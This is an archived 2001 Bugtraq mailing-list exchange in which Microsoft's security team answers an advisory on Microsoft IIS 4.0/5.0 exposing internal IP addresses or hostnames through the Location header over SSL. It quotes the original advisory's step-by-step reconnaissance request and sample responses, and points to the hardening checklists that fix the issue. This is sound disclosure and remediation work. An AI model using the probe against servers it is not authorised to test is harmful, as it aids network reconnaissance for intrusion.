[22173] in bugtraq
RE: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
daemon@ATHENA.MIT.EDU (Microsoft Security Response Center)
Thu Aug 9 19:35:54 2001
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Date: Thu, 9 Aug 2001 10:24:52 -0700
Message-ID: <C10F7F33B880B248BCC47DB446738847034BB41A@red-msg-07.redmond.corp.microsoft.com>
From: "Microsoft Security Response Center" <secure@microsoft.com>
To: <bugtraq@securityfocus.com>
Cc: "Microsoft Security Response Center" <secure@microsoft.com>
Content-Transfer-Encoding: 8bit
The checklists for securing IIS4 and IIS5 discuss this issue.
Specifically:
"Disable IP Address in Content-Location
The Content-Location header may expose internal IP addresses that are
usually hidden or masked behind a Network Address Translation (NAT)
Firewall or proxy server. Refer to Q218180 for further information about
disabling this option."
The referenced Knowledge Base Article contains information on how to
force IIS to use the FQDN instead of the IP address.
(Q218180) Internet Information Server Returns IP Address in HTTP Header
(Content-Location) -
http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180
"There is a value that can be modified in the IIS metabase to change the
default behavior from exposing IP addresses to send the FQDN instead.
This allows the IP address to be masked by the domain name."
The IIS4 checklist is available here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsol
utions/security/tools/iischk.asp
And the IIS5 checklist here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsol
utions/security/tools/iis5chk.asp
Regards,
Secure@Microsoft.com
-----Original Message-----
From: Marek Roy [mailto:marek_roy@hotmail.com]
Sent: Tuesday, August 07, 2001 9:55 PM
To: bugtraq@securityfocus.com
Subject: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
GGS-AU / e-Synergies Security Advisory
August 8, 2001
Internal IP Address Disclosure in Microsoft-IIS 4.0 &
5.0
Synopsis:
e-Synergies has discovered and researched remote
vulnerability in Internet Information Server from
Microsoft. Successful
exploitation of this vulnerability can reveal critical
internal information such as Internal IP Address or
Internal host name.
Affected Versions:
Microsoft IIS 4.0 running SSL
Microsoft IIS 5.0 running SSL
Description:
By connecting manually to port TCP/443 (SSL) using
Perl(SSLeay) or any other tools, a remote user has
the ability to retrieve
Internal IP address or reveal the machine's network
node hostname.
Exploit:
1- Browse the web site using a normal SSL
browser and find any directory. I.E.:
https://www.target.com/images/icon.gif
2- Using a compatible SSL Perl script, execute the
following command once connected to port 443 of
www.target.com:
GET /images HTTP/1.0
3- The result should look like this:
HTTP/1.1 302 Object Moved
Location: https://192.168.1.10/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx
or
HTTP/1.1 302 Object Moved
Location: https://netbiosname/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx
Remarks:
Using HTTP/1.1 instead of HTTP/1.0 will not give the
same result.
Credits:
Marek Roy
Senior IT Security Consultant
Please send suggestions, updates, and comments to:
GGS-AU / e-synergies, Sydney, Australia
Level 9
65 York Street
Sydney NSW 2001
Australia
Phone: +61 2 9279 2533
Fax: +61 2 9279 2544
Email: enquiries@ggs-au.com
http://www.ggs-au.com
